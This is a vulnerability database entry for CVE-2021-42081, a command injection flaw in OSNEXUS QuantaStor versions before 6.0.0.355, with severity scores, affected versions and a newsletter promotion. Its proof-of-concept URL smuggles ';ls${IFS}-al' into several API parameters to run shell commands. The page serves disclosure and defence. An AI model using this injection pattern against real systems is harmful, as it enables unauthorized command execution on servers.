cbcvebase.
CVE-2021-42081
published 2023-07-10

CVE-2021-42081: An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC…

PriorityP347high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
EPSS
0.99%
58.1th percentile
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API. POC http:///qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al

Affected

1 ranges
VendorProductVersion rangeFixed in
osnexusquantastor< 6.0.0.3556.0.0.355
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.